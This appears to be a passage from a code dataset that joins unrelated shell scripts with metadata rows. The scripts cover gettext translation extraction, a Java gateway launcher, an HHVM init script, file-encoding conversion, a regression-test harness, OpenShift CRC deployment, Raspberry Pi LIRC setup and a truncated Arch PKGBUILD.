POTFILE_SIZE_PRE=`stat -c%s "$PO_PATH/messages.pot"`

# Time to generate the IN file: top-level HTML files plus any template,
# js and src sources that actually call gettext.
ls "$ROOT/" | grep .html >> "$POTFILES_PATH"
sed -i -e "s#^#$ROOT/#" "$POTFILES_PATH"
if [ -d "$ROOT/templates" ]; then
    grep -rl gettext "$ROOT/templates/" >> "$POTFILES_PATH"
fi
if [ -d "$ROOT/js" ]; then
    grep -rl gettext "$ROOT/js/" >> "$POTFILES_PATH"
fi
if [ -d "$ROOT/src" ]; then
    grep -rl gettext "$ROOT/src/" >> "$POTFILES_PATH"
fi

# Generate the POT file, merging Python, C and JavaScript extractions.
xgettext -L Python -f "$POTFILES_PATH" --from-code UTF-8 -o "$PO_PATH/messages.pot" --force-po --add-comments
xgettext -j -L C -f "$POTFILES_PATH" --from-code UTF-8 -o "$PO_PATH/messages.pot" --force-po --add-comments
xgettext -j -L JavaScript -f "$POTFILES_PATH" --from-code UTF-8 -o "$PO_PATH/messages.pot" --force-po --add-comments
sed --in-place "$PO_PATH/messages.pot" --expression=s/CHARSET/UTF-8/
# sed --in-place "$PO_PATH/messages.pot" --expression="s/#: $COMPONENTNAME\//#: /"
rm "$POTFILES_PATH"

POTFILE_SIZE_POST=`stat -c%s "$PO_PATH/messages.pot"`
# We don't care if only the date has changed, and I'm too lazy to write a smarter check
if [ $POTFILE_SIZE_PRE -eq $POTFILE_SIZE_POST ]; then
    git --git-dir $ROOT/.git --work-tree=$PWD/$ROOT checkout "po/$COMPONENTNAME/messages.pot"
fi

# Create or update a PO file for language $1 and regenerate its JSON.
create_po () {
    if [ ! -e "$PO_PATH/$1.po" ]; then
        # Create PO file
        cp "$PO_PATH/messages.pot" "$PO_PATH/$1.po"
        sed --in-place "$PO_PATH/$1.po" --expression=s/CHARSET/UTF-8/
        sed --in-place "$PO_PATH/$1.po" --expression=s/Language:\ \\\\n/Language:\ $1\\\\n/
    else
        # Update PO file
        msgmerge "$PO_PATH/$1.po" "$PO_PATH/messages.pot" -o "$PO_PATH/$1.po"
    fi
    # Create JSON files from PO files
    po2json --domain "$COMPONENTNAME" --format jed "$PO_PATH/$1.po" "$PO_PATH/$1.json"
}

# If the POT file is exactly 580 it does not include any translations whatsoever
if [ $POTFILE_SIZE_POST -eq 580 ]; then
    rm -r "$ROOT/po"
    echo "$COMPONENTNAME: does not need translations"
else
    create_po en
    create_po sv
    cd $ROOT
    gulp minify
    cd ../
    echo "$COMPONENTNAME: updated any PO files and JSON files that needed updating"
    # Open files for review
    atom $ROOT
fi
| true
|
5abe26e615dd2bada75569de137d4346b503efc3
|
Shell
|
daiyun/SwordGateway
|
/gateway-server/boot/src/scripts/start.sh
|
UTF-8
| 1,263
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash
# Start the SwordGateway server as a background Java process, refusing to
# start twice, and wait until the JVM appears before reporting success.

cd `dirname $0`
BIN_DIR=`pwd`
cd ..
DEPLOY_DIR=`pwd`
CONF_DIR=$DEPLOY_DIR/conf

# Find all config files to assign values to the properties below; if these
# properties conflict, they may be overwritten.  (A maven archetype cannot
# overwrite sh files because many characters would be converted wrongly.)
SERVER_NAME=`hostname`
LOGS_DIR=$DEPLOY_DIR/logs

# Refuse to start if a Java process already runs with this conf directory.
PIDS=`ps -ef | grep java | grep -v grep | grep "$CONF_DIR" |awk '{print $2}'`
if [ -n "$PIDS" ]; then
    echo "ERROR: The $SERVER_NAME already started!"
    echo "PID: $PIDS"
    exit 1
fi

if [ ! -d $LOGS_DIR ]; then
    mkdir $LOGS_DIR
fi
STDOUT_FILE=$LOGS_DIR/stdout.log

# Build a colon-separated classpath from every jar in lib/.
LIB_DIR=$DEPLOY_DIR/lib
LIB_JARS=`ls $LIB_DIR|grep .jar|awk '{print "'$LIB_DIR'/"$0}'|tr "\n" ":"`

echo -e "Starting the $SERVER_NAME ...\c"
nohup java $JAVA_OPTS $JAVA_MEM_OPTS $JAVA_DEBUG_OPTS $JAVA_JMX_OPTS -classpath $CONF_DIR:$LIB_JARS com.doctorwork.sword.gateway.Application > $STDOUT_FILE 2>&1 &

# Poll once a second until the Java process shows up in the process list.
COUNT=0
while [ $COUNT -lt 1 ]; do
    echo -e ".\c"
    sleep 1
    COUNT=`ps -f | grep java | grep -v grep | grep "$DEPLOY_DIR" | awk '{print $2}' | wc -l`
    if [ $COUNT -gt 0 ]; then
        break
    fi
done

echo "OK!"
PIDS=`ps -f | grep java | grep -v grep | grep "$DEPLOY_DIR" | awk '{print $2}'`
echo "PID: $PIDS"
echo "STDOUT: $STDOUT_FILE"
| true
|
f048b43e77a384eaf11dfc3263f64f817b7fee24
|
Shell
|
Puqiyuan/Bash-Script-Program
|
/Convert.sh
|
UTF-8
| 404
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
# Convert Shift-JIS sources (*.nas, *c, *.txt, *.h) to UTF-8 into a
# "nice/" directory, lowercase the names, and rename *.nas -> *.asm.
# The conversion is skipped entirely if "nice/" already exists.

DIR=nice
if [ ! -d "$DIR" ]; then
	mkdir nice
	# NOTE(review): the "*c" glob also matches any name merely ending in
	# "c" — "*.c" may have been intended; confirm.
	for file in *.nas *c *.txt *.h; do
		iconv -f SHIFT-JIS -t UTF-8 "$file" > "$file.nice"
	done
	mv *.nice nice
	cd nice || exit 1
	# Strip the 5-character ".nice" suffix added above.
	for file in *.nice; do
		mv "$file" "${file%?????}"
	done
	rename 'y/A-Z/a-z/' *
	# Give assembler sources their conventional extension.
	for x in *.nas; do mv "$x" "${x%.nas}.asm"; done
fi
cp ~/Makefile .
cp /home/pqy7172/RongOS/z_tools/ ../ -r
| true
|
6b18b577bbd07d24d1b3211dc3275dbcde652c62
|
Shell
|
pld-linux/hhvm
|
/hhvm-fcgi.init
|
UTF-8
| 3,154
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/sh
#
# hhvm-fcgi -- startup script for HHVM FastCGI
#
# chkconfig: 345 80 20
#
# description: Starts The HHVM FastCGI Daemon
# processname: hhvm-fcgi
# config: /etc/hhvm/server.hdf
# pidfile: /var/run/hhvm/hhvm-fcgi.pid
#
# NOTE(review): uses PLD-Linux rc helpers (show/busy/ok/fail/nls/msg_*)
# sourced from /etc/rc.d/init.d/functions, and 'local', which is not
# strictly POSIX sh — relies on the distro's /bin/sh supporting it.

# Source function library
. /etc/rc.d/init.d/functions

# Get network config
. /etc/sysconfig/network

# Check that networking is up.
if is_yes "${NETWORKING}"; then
	if [ ! -f /var/lock/subsys/network -a "$1" != stop -a "$1" != status ]; then
		msg_network_down "HHVM FastCGI Daemon"
		exit 1
	fi
else
	exit 0
fi

# Set defaults
# Default values. This values can be overwritten in '/etc/sysconfig/hhvm-fcgi'
DAEMON="/usr/bin/hhvm"
NAME="hhvm"
CONFIG_FILE="/etc/hhvm/server.hdf"
RUN_AS_USER="http"
LISTEN_PORT="9000"
ADDITIONAL_ARGS=""

# Get service config - may override defaults
[ -f /etc/sysconfig/hhvm-fcgi ] && . /etc/sysconfig/hhvm-fcgi

PIDFILE="/var/run/hhvm/hhvm-fcgi.pid"
DAEMON_ARGS="--config ${CONFIG_FILE} \
	--user ${RUN_AS_USER} \
	--mode daemon \
	-vServer.Type=fastcgi \
	-vServer.Port=${LISTEN_PORT} \
	-vPidFile=${PIDFILE} \
	${ADDITIONAL_ARGS}"

# configtest itself
# must return non-zero if check failed
# output is discarded if checkconfig is ran without details
configtest() {
	start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --test
}

# wrapper for configtest
checkconfig() {
	local details=${1:-0}

	if [ $details = 1 ]; then
		# run config test and display report (status action)
		show "Checking %s configuration" "HHVM FastCGI Daemon"; busy
		local out
		out=$(configtest 2>&1)
		RETVAL=$?
		if [ $RETVAL = 0 ]; then
			ok
		else
			fail
		fi
		[ "$out" ] && echo >&2 "$out"
	else
		# run config test and abort with nice message if failed
		# (for actions checking status before action).
		configtest >/dev/null 2>&1
		RETVAL=$?
		if [ $RETVAL != 0 ]; then
			show "Checking %s configuration" "HHVM FastCGI Daemon"; fail
			nls 'Configuration test failed. See details with %s "checkconfig"' $0
			exit $RETVAL
		fi
	fi
}

# Start the daemon unless the subsys lock says it is already running.
start() {
	# Check if the service is already running?
	if [ -f /var/lock/subsys/hhvm-fcgi ]; then
		msg_already_running "HHVM FastCGI Daemon"
		return
	fi

	checkconfig
	msg_starting "HHVM FastCGI Daemon"
	daemon --pidfile $PIDFILE $DAEMON $DAEMON_ARGS
	RETVAL=$?
	[ $RETVAL -eq 0 ] && touch /var/lock/subsys/hhvm-fcgi
}

# Stop the daemon with SIGTERM and remove the subsys lock.
stop() {
	if [ ! -f /var/lock/subsys/hhvm-fcgi ]; then
		msg_not_running "HHVM FastCGI Daemon"
		return
	fi

	# Stop daemons.
	msg_stopping "HHVM FastCGI Daemon"
	killproc --pidfile $PIDFILE $NAME -TERM
	RETVAL=$?
	rm -f /var/lock/subsys/hhvm-fcgi
}

# Restart only if the service is running; otherwise report status code $1.
condrestart() {
	if [ ! -f /var/lock/subsys/hhvm-fcgi ]; then
		msg_not_running "HHVM FastCGI Daemon"
		RETVAL=$1
		return
	fi

	checkconfig
	stop
	start
}

RETVAL=0
# See how we were called.
case "$1" in
  start)
	start
	;;
  stop)
	stop
	;;
  restart)
	checkconfig
	stop
	start
	;;
  try-restart)
	condrestart 0
	;;
  force-reload)
	condrestart 7
	;;
  checkconfig|configtest)
	checkconfig 1
	;;
  status)
	status --pidfile $PIDFILE hhvm-fcgi hhvm
	RETVAL=$?
	;;
  *)
	msg_usage "$0 {start|stop|restart|try-restart|reload|force-reload|checkconfig|status}"
	exit 3
esac

exit $RETVAL
| true
|
9f2a0842462458dc2fa59ac63313c7052b37d66b
|
Shell
|
lokialone/protojs
|
/shell/passwordManager/test.sh
|
UTF-8
| 862
| 3.5
| 4
|
[] |
no_license
|
#!/bin/zsh
# author: lokialone
# Simple interactive password viewer: reads "name:secret" lines from a
# file, shows a numbered menu of names, and prints the chosen secret.

# Location of the password file
filename='/Users/lokalone/record/work/password'
list=()   # entry names (field 1 of each line)
res=()    # full "name:secret" lines
# zsh array indices start at 1...
i=1

# Unused here; clears the screen and shows disk usage.
function diskspace {
	clear
	df -k
}

# Read the password file, filling list[] with names and res[] with lines.
function getContentFormFile {
	while read line
	do
		list[${i}]=`echo ${line} | awk -F":" '{print $1}'`
		res[${i}]=$line
		(( ++i ))
	done < $filename
}

# Print the numbered menu and read the user's choice into $option.
function menu {
	let j=1
	clear
	for index in ${list[@]}
	do
		echo -e "\t${j}. ${index}"
		((j++))
	done
	echo -e "\t0. Exit menu"
	echo -en "\t\tEnter an option: "
	read -n option
}

# Print the secret (field 2) of the entry selected in $option.
function showPasswordInfo {
	echo ${res[$option]} | awk -F":" '{print $2}'
}

getContentFormFile
# Main loop: show menu until the user picks 0.
while [ 1 ]
do
	menu
	case $option in
		0)
			exit
			break;;
		*)
			showPasswordInfo;;
	esac
	echo -en "\n\n\t\t\tHit any key to continue"
	read -n 1 line
done
clear
| true
|
aa8e4930b93bb2a735e7b6f4c3e1a4d3ae80eadb
|
Shell
|
mskcc/pipeline-kickoff
|
/src/integration-test/resources/scripts/integrationTest.sh
|
UTF-8
| 7,164
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
# Regression harness: runs the PROD and CURRENT Pipeline Kickoff builds on
# a list of projects and compares their outputs.

source "${BASH_SOURCE%/*}/utils.sh"

# Argument variants each project is run with ("noArg" = no extra flag).
arguments=("noArg" "-exome")
#arguments=("noArg" "-noPortal" "-f" "-exome" "-s")

# Set up paths and clear the test workspace.  Sets the globals used by the
# rest of the script (testDir, expectedPath, actualPath, prodTestKickoff,
# currentTestKickoff, failingDir, succeededProjectsList, archivePath, ...).
init() {
	jdk8=~/jdk
	java8="${jdk8}/bin/java"

	cd "${BASH_SOURCE%/*}"
	cd "../../../../.."
	# NOTE(review): ${projectDir} is never set in this file — presumably
	# exported by utils.sh; confirm.
	echo "Project directory: ${projectDir}"
	pwd
	testDir="$(pwd)/test"

	echo "Clearing test directory ${testDir}"
	find ${testDir} -mindepth 1 -delete

	expectedPath="${testDir}/expectedOutput"
	mkdir -p ${expectedPath}
	actualPath="${testDir}/actualOutput"
	mkdir -p ${actualPath}

	prodKickoff=~/sources/pipeline-kickoff/krista/pipeline_kickoff_prod
	prodTestKickoff="${testDir}/pipeline_kickoff_prod/exemplar"
	currentKickoff="pipeline-kickoff"
	currentTestKickoff="${testDir}/pipeline-kickoff"

	testResults="${testDir}/testResults"
	failingDir="${testResults}/failing"
	mkdir -p ${failingDir}
	succeededProjectsList="${testResults}/succeededProjects.txt"
	archivePath=~/testIfs/projects/BIC/archive/

	echo "Succeeded projects path: ${succeededProjectsList}"
}
# Strip every non-alphanumeric character from $1, e.g. "-exome" -> "exome".
getArgName() {
	local raw=$1
	printf '%s\n' "${raw//[![:alnum:]]/}"
}
# Map the placeholder "noArg" to an empty string; pass any real flag through.
getArgToPass() {
	case "$1" in
		noArg) echo "" ;;
		*)     echo "$1" ;;
	esac
}
# Build "<base>/<project>/<sanitized-arg>" output path for one run.
getOutputPath() {
	argName=$(getArgName $3)
	echo "${1}/${2}/${argName}"
}

# Run the production (trunk) kickoff for project $1 with argument $2,
# writing into the expected-output tree.
runTrunk() {
	header3 "Running [PROD] version of Pipeline Kickoff for project ${1} with argument $2"
	echo "Changing directory to ${prodTestKickoff}"
	cd ${prodTestKickoff}

	outputPath=$(getOutputPath $expectedPath $1 $2)
	echo "Output path: ${outputPath}"
	mkdir -p ${outputPath}

	argToPass=$(getArgToPass $2)
	echo "Argument passed: ${argToPass}"
	${java8} -cp lib/*:classes org.mskcc.kickoff.lims.CreateManifestSheet -p ${1} -o ${outputPath} -rerunReason TEST ${argToPass}
	cd ~
}

# Run the current (under-test) kickoff for project $1 with argument $2,
# writing into the actual-output tree.
runCurrent() {
	header3 "Running [CURRENT] version of Pipeline Kickoff for project ${1} with argument $2"
	echo "Chaging directory to ${currentTestKickoff}"
	cd ${currentTestKickoff}

	outputPath=$(getOutputPath $actualPath $1 $2)
	echo "Output path: ${outputPath}"
	mkdir -p ${outputPath}

	argToPass=$(getArgToPass $2)
	echo "Argument passed: ${argToPass}"
	./gradlew run -Dspring.profiles.active=test,igo -PprogramArgs=-p,${1},-o,${outputPath},-rerunReason,TEST,${argToPass}
	#${java8} -cp .:libs/*:build/classes/main:build/resources/main -Dspring.profiles.active=dev org.mskcc.kickoff.lims.CreateManifestSheet -p ${1} -o ${outputPath} -rerunReason TEST ${argToPass}
	cd ~
}

# Compare the trunk output against the current output for one project/arg
# pair via the Gradle regressionTest task.
runTest() {
	header3 "Running [TEST] comparing trunk and current for project $1 with argument $2"
	echo "Changing directory to ${currentTestKickoff}"
	cd ${currentTestKickoff}

	actual=$(getOutputPath $actualPath $1 $2)
	expected=$(getOutputPath $expectedPath $1 $2)
	echo "Actual output path: $actual"
	echo "Expected output path: $expected"
	./gradlew regressionTest -Dspring.profiles.active=test,igo -Darg=${2} -Dproject=${1} -DexpectedOutput=${expected} -DactualOutput=${actual} -DfailingOutputPath=${failingDir} -DsucceededProjectsList=${succeededProjectsList}
	#${java8} -cp .:libs/*:build/classes/main:build/classes/integrationTest:build/resources/integrationTest -Dspring.profiles.active=dev -Darg=${2} -Dproject=${1} -DexpectedOutput=${expected} -DactualOutput=${actual} -DfailingOutputPath=${failingDir} -DsucceededProjectsList=${succeededProjectsList} org.junit.runner.JUnitCore org.mskcc.kickoff.characterisationTest.RegressionTest
	cd ~
}

# Mirror both source trees (prod and current) into the test directory.
copySourceCode() {
	echo "Copying prod source code from: ${prodKickoff} to test directory: ${testDir}"
	rsync -az --exclude '.*' ${prodKickoff} "${testDir}/"
	echo "Copying current kickoff source code from: ${currentKickoff} to test directory: ${testDir}"
	rsync -az --exclude '.*' ${currentKickoff} "${testDir}/"
}

# Clear actual output (and, when forcing, expected output) plus result lists.
clearOutputPaths() {
	if [ ${forceTrunk} = "true" ]; then
		find ${expectedPath} -mindepth 1 -delete
	fi
	find ${actualPath} -mindepth 1 -delete
	# NOTE(review): ${failedProjectsList} is never defined anywhere in this
	# script — this rm expands to `rm -f` with no operand; confirm intent.
	rm -f ${failedProjectsList}
	rm -f ${succeededProjectsList}
}

# Empty the shared archive directory before each run.
clearArchivePath() {
	echo "Clearning archive path ${archivePath}"
	find ${archivePath} -mindepth 1 -delete
}

# Print a pass/fail line per project/arg pair based on the succeeded list,
# pointing at the failing-output directory when anything failed.
printResults() {
	allSucceeded="true"
	echo "Test results"
	IFS=$'\n' read -d '' -r -a succeededProjects < "${succeededProjectsList}"
	for project in "${projects[@]}";
	do
		for arg in "${arguments[@]}";
		do
			projectWithArg="${project}${arg}"
			if [[ "${succeededProjects[@]}" =~ "${projectWithArg}" ]]; then
				success "$project with arg $arg"
			else
				error "$project with arg $arg"
				allSucceeded="false"
			fi
		done
	done

	if [ ${allSucceeded} == "false" ]; then
		echo "For full information about failed tests visit: ${failingDir}"
	fi
}

# "force" as first argument re-runs trunk even when its output exists.
forceTrunk="false"
if [ $# -gt 0 ] && [ $1 = "force" ]; then
	forceTrunk="true"
fi

init $1

# Projects under test; comments note why each one is interesting.
projects=(
"01234_EWA" # not existing project
"02756_B" # !BicAutorunnable, Recipe WholeExome, Xenograft
"03498_D" # Canno be run through Create manifest sheet
"04298_C" # Recipe WholeGenomeSeq
"04298_D" # !manual Demux
"04495" # manual Demux
"04657_D" # ChIPSeq recipe
"05257_AX" # investigator patient IDs are problematic
"05372_B" # Request name *PACT*
"05500_AZ" # !BicAutorunnable && "NOT_AUTORUNNABLE" in Readme
"05514_I" # IMPACT bait set
"05583_F" #pairing changes
"05600" # No Status Sequence Analysis QC
"05667_AB" #pairing changes
"05667_AT" #pairing changes
"05667_AW" #pairing changes
"05667_AY"
"05684_D" # KK- NimlegenHybridizationProtocol1
"05737_R" # HEMEPACT_v3 bait set, species in Xenograft
"05816_AA"
"05873_H" # Failed Sequence Analysis QC
"05971_G" # IMPACT bait set, species in Xenograft
"06049_I" #pairing changes
"06049_R" #pairing changes
"06049_U" #pairing changes
"06208_D" # Agilient Capture KAPA Libary
"06259_B"
"06362" #no sample level qc
#"06477_E" # !KAPAAgilentCaptureProtocol2, very slow project
"06507" # Request with 2 samples with same name
"06507_D" # rename FASTQ
"06507_E"
"06836_E" # IMPACT bait set, two samples are failed in post process QC
"06907_J"
"06912_B" # Failed Reprocess Sequence Analysis QC
"06938_M" # Exemplar Sample status Failed-Complete
"06990_E"
"07037_O"
"07165_D"
"07275" # germline-no pipeline run
"07306_D" # Request with 2 samples with same name
"07323_F" #pairing changes
"07372_B"
"07437_B" # BR7 and BR11 match each other, neither one matches corresponding DMP normal
"07473" # Under review Sequence Analysis QC
"07507_B" # no recipe in the sample sheet
"07520"
"07527_B"
"08192_E" # no tumor
)

projectsList=$(printf ",%s" "${projects[@]}")
header1 "Running Pipeline Kickoff tests for projects ${projectsList:1}"

copySourceCode

echo "Clearing output paths: ${expectedPath} and ${actualPath}"
clearOutputPaths

# Main driver: for each project/arg pair, (re)generate trunk output if
# needed, run the current build, then compare the two.
for project in ${projects[*]}
do
	for arg in "${arguments[@]}"
	do
		header2 "Running test for project ${project} with argument ${arg}"
		clearArchivePath

		expectedDir=$(getOutputPath $expectedPath $project $arg)
		echo "Expected dir: ${expectedDir}"
		if [ ${forceTrunk} = "false" ] && [ -d ${expectedDir} ]; then
			echo "Skipping running trunk as output for project ${project} already exists"
			echo "To force always running trunk even when trunk output is already generated pass 'force' argument to script"
		else
			runTrunk $project $arg
		fi

		runCurrent $project $arg
		runTest $project $arg
	done
done

printResults
| true
|
9995cbf427849b27aaf1faeed70ec2216555253f
|
Shell
|
CCI-MOC/openshift-acct-mgt
|
/tools/crc/deploy.sh
|
UTF-8
| 1,067
| 3.34375
| 3
|
[] |
no_license
|
# Build and Deploy openshift-acct-mgt on CRC
#
# Requires prior `oc login` and running from root of repo.
#
# Deployment will be done in namespace named `onboarding`.
# To deploy to a different namespace, change the name in `project.yaml`
# and variable `NAMESPACE`.

set -e

# macOS uses docker; elsewhere use rootful podman and skip TLS verification
# for the self-signed CRC registry route.
if [ "$(uname)" == "Darwin" ]; then
    CMD="docker"
    INSECURE_FLAG=""
else
    CMD="sudo podman"
    INSECURE_FLAG="--tls-verify=false"
fi

INTERNAL_REGISTRY="default-route-openshift-image-registry.apps-crc.testing"

# yaml spec rather than new-project command for idempotency
NAMESPACE="onboarding"
oc apply -f tools/crc/project.yaml

# Authenticate against the CRC internal registry using the current oc
# token, then build and push the image.
$CMD login $INSECURE_FLAG -u kubeadmin -p "$(oc whoami -t)" "$INTERNAL_REGISTRY"
$CMD build . -t "$INTERNAL_REGISTRY/$NAMESPACE/openshift-acct-mgt:latest"
$CMD push $INSECURE_FLAG "$INTERNAL_REGISTRY/$NAMESPACE/openshift-acct-mgt:latest"

oc apply -k k8s/overlays/crc

# TODO: Check for error state
while [ "$(oc -n onboarding get pods | grep onboarding | grep -v deploy | grep -c Running)" == "0" ]; do
    echo "Waiting until pod is ready..."
    sleep 10
done
| true
|
97d033500df05a1b4eb42def14dd66878f91dc93
|
Shell
|
notalentgeek/pedge
|
/script/raspbian_jessie/lirc.sh
|
UTF-8
| 3,247
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
# Install and configure LIRC on Raspberry Pi (Raspbian Jessie):
# packages, boot overlay, kernel modules, lircrc run commands, hardware
# configuration, IR dictionary, and a service restart.

# Change directory to `/home/pi`.
cd /home/pi &&

# Update, upgrade, and install packages.

# Update and upgrade packages.
yes | sudo DEBIAN_FRONTEND=noninteractive apt-get -yq update &&
yes | sudo DEBIAN_FRONTEND=noninteractive apt-get -yq upgrade &&

# Install packages.
yes | sudo DEBIAN_FRONTEND=noninteractive apt-get -yq install lirc liblircclient-dev &&

# Configure boot setup.
sudo /bin/sh -c 'printf "\ndtoverlay=lirc-rpi,gpio_in_pin=23,gpio_out_pin=22" >> /boot/config.txt' &&

# Configure GPIO for IR transceiver.
# (Fixed quoting: the original used doubled quotes ""...."" which split the
# string so the gpio_in_pin/gpio_out_pin arguments never reached the file.)
sudo /bin/sh -c 'printf "\nlirc_dev\nlirc_rpi gpio_in_pin=23 gpio_out_pin=22" >> /etc/modules' &&

# Create local LIRC run commands.
sudo /bin/sh -c 'printf "\nbegin\n button = KEY_1\n config = KEY_1\n prog = pysoc\nend\nbegin\n button = KEY_2\n config = KEY_2\n prog = pysoc\nend\nbegin\n button = KEY_3\n config = KEY_3\n prog = pysoc\nend" > /home/pi/.lircrc' &&

# Create system - wide LIRC run commands.
sudo /bin/sh -c 'printf "\nbegin\n button = KEY_1\n config = KEY_1\n prog = pysoc\nend\nbegin\n button = KEY_2\n config = KEY_2\n prog = pysoc\nend\nbegin\n button = KEY_3\n config = KEY_3\n prog = pysoc\nend" > /etc/lirc/lircrc' &&

# Re - create hardware configuration.

# Delete hardware configuration.
sudo rm /etc/lirc/hardware.conf &&

# Create hardware configuration.
sudo /bin/sh -c 'printf "\n########################################################\n# /etc/lirc/hardware.conf\n#\n# Arguments which will be used when launching lircd\nLIRCD_ARGS=\"--uinput\"\n\n# Do not start lircmd even if there seems to be a good config file\n# START_LIRCMD=false\n\n# Do not start irexec, even if a good config file seems to exist.\n# START_IREXEC=false\n\n# Try to load appropriate kernel modules\nLOAD_MODULES=true\n\n# Run \"lircd --driver=help\" for a list of supported drivers.\nDRIVER=\"default\"\n# usually /dev/lirc0 is the correct setting for systems using udev\nDEVICE=\"/dev/lirc0\"\nMODULES=\"lirc_rpi\"\n\n# Default configuration files for your hardware if any\nLIRCD_CONF=\"\"\nLIRCMD_CONF=\"\"\n########################################################" > /etc/lirc/hardware.conf' &&

# Re - create IR dictionary.

# Delete IR dictionary.
sudo rm /etc/lirc/lircd.conf &&

# Create IR dictionary.
sudo /bin/sh -c 'printf "\n# Please make this file available to others\n# by sending it to <lirc@bartelmus.de>\n#\n# this config file was automatically generated\n# using lirc-0.9.0-pre1(default) on Sat Jan 7 22:45:56 2017\n#\n# contributed by \n#\n# brand: /home/pi/lircd.conf\n# model no. of remote control: \n# devices being controlled by this remote:\n#\nbegin remote\n name pysoc\n bits 13\n flags RC5|CONST_LENGTH\n eps 30\n aeps 100\n one 924 840\n zero 924 840\n plead 970\n gap 113287\n toggle_bit_mask 0x0\n begin codes\n KEY_1 0x1001\n KEY_2 0x1002\n KEY_3 0x1003\n end codes\nend remote" > /etc/lirc/lircd.conf' &&

# Re - start LIRC service.

# Stop LIRC service.
sudo /etc/init.d/lirc stop &&

# Start LIRC service.
sudo /etc/init.d/lirc start
| true
|
478896f68c87daa1c4d7635a742dfe46c881244f
|
Shell
|
s23870-pj-Patryk-Literski/sop2020-21_25c
|
/s18504/lab3/cwicz2/zad5.sh
|
UTF-8
| 127
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
# Print the contents of all file arguments, first in the given order,
# then again in reverse order.

# "$@" (quoted) keeps filenames containing spaces as single array elements.
input=("$@")

for ((i = 0; i < $#; i++)); do
	cat -- "${input[i]}"
done

for ((i = $# - 1; i >= 0; i--)); do
	cat -- "${input[i]}"
done
| true
|
3b50bb41b4692c84f5a0b1846bde0bff410651c1
|
Shell
|
olayad/bash-bootcamp
|
/localusers/luser-demo08.sh
|
UTF-8
| 918
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash

# This script demonstrate I/O redirection.

# Redirect STDOUT to a file
FILE="/tmp/data"
head -n1 /etc/passwd > ${FILE}

# Redirect STDIN to a program
echo
read LINE < ${FILE}
echo "Contents of line: ${LINE}"

# Redirct STDOUT to a file, appending to the file
echo
echo "${RANDOM} ${RANDOM}" >> ${FILE}
echo "Contents of ${FILE}:"
cat ${FILE}

# Redirect STDIN to a program, using FD 0.
read LINE 0< ${FILE}
echo
echo "LINE contains: ${LINE}"

# Redirect STDOUT to a file using FD 1, overwritting the the file
head -n3 /etc/passwd 1> ${FILE}
echo
echo "Contents of ${FILE}"
cat ${FILE}

# Send output to STDERR
echo
echo "This is STDERR!" >&2

# Discard STDOUT
echo
echo "Discarding STDOUT:"
head -n3 /etc/passwd /fakefile > /dev/null

# Discard STDOUT and STDERR
echo
echo "Discarding both STDOUT and STDERR:"
head -n3 /etc/passwd /fakefile &> /dev/null

# Clean up
# NOTE(review): ERR_FILE is never defined in this script — it expands to
# nothing here, so only ${FILE} is removed; confirm intent.
rm ${FILE} ${ERR_FILE} &> /dev/null
| true
|
b8f71ca8a4cffe5e2ea559b94feef2606671dd04
|
Shell
|
zxxzxxxxz/reversi_nn
|
/loop.sh
|
UTF-8
| 454
| 2.578125
| 3
|
[] |
no_license
|
#!/bin/bash -eu
# Continuous training loop for the reversi NN: generate a fixed test set
# once, then repeatedly generate fresh training data and train the model.
# Runs forever; stop with Ctrl-C.  (-eu: abort on errors/unset variables.)

X_TRAIN_PATH="$HOME/.reversi_nn/x_train.npy"
Y_TRAIN_PATH="$HOME/.reversi_nn/y_train.npy"
X_TEST_PATH="$HOME/.reversi_nn/x_test.npy"
Y_TEST_PATH="$HOME/.reversi_nn/y_test.npy"
MODEL_PATH="$HOME/.reversi_nn/model.h5"

# The test set is generated once so evaluation stays comparable across runs.
python3 generate_testdata.py $X_TEST_PATH $Y_TEST_PATH
while true
do
	python3 generate_traindata.py $X_TRAIN_PATH $Y_TRAIN_PATH
	python3 train.py $MODEL_PATH $X_TRAIN_PATH $Y_TRAIN_PATH $X_TEST_PATH $Y_TEST_PATH
done
| true
|
78b1da39d7b976a72f0db4721fc9e2935aab8875
|
Shell
|
levilelis/psvn
|
/chen/astar/hanoi_astar_pred.sh
|
UTF-8
| 645
| 2.859375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Run the Chen A* solver on Towers of Hanoi (4 pegs, 12 discs) for a grid
# of probe parameters, appending results to one file per parameter pair.

# Limit virtual memory to ~6 GB (ulimit -v takes KB).
ulimit -v 6000000

#set the time limit to one hour
#ulimit -t 600

# Path to which the results will be added
RESULTS=resultshash_multipleprobes/hanoi
OUTPUT=a_star_hanoi_4p_12d_1000_abst_1_2

for PROBES in 100; do
	for META_PROBES in 1000 2000 3000 10000; do
		# Record the parameter pair at the top of its result file, then run
		# the solver in the background so parameter settings run in parallel.
		printf ${PROBES}" "${META_PROBES}"\n" >> ${RESULTS}/${OUTPUT}_${PROBES}_${META_PROBES}
		(./hanoi_4p_12d.chenastar ${PROBES} ${META_PROBES} 0 0 0 ../../pdb/hanoi/hanoi_4p_12d_1 ../../problems/hanoi/hanoi_4p_12d_1000 ../solutions/hanoi/a_star_hanoi_4p_12d_1000_abst_1 >> ${RESULTS}/${OUTPUT}_${PROBES}_${META_PROBES}) &
	done
done
echo
| true
|
cdbee80cfeebf88043799145dd9a3ca496213427
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/vault-ssh-helper/PKGBUILD
|
UTF-8
| 1,108
| 2.828125
| 3
|
[] |
no_license
|
# Maintainer: Adrián Pérez de Castro <aperez@igalia.com>
# Arch Linux PKGBUILD for vault-ssh-helper: builds HashiCorp's helper that
# lets sshd verify One-Time Passwords issued by a Vault server.
pkgname='vault-ssh-helper'
pkgdesc='Allows using OTP authentication generated by a Vault server'
pkgver='0.1.3'
pkgrel='1'
url='https://github.com/hashicorp/vault-ssh-helper/'
arch=('x86_64' 'i686')
license=('MPL')
makedepends=('go')
depends=('glibc')
source=("${url}/archive/v${pkgver}.tar.gz")
sha512sums=('ff42e86c941ada0352eb58f29ab36785d9ca2777fbfa8f1b830e752e37376b258ad812e75b764709a1b1f22d34dffafb3515e3f196386987875a1a5fcfb04759')
# Pre-modules Go builds expect the source under $GOPATH/src/<import-path>.
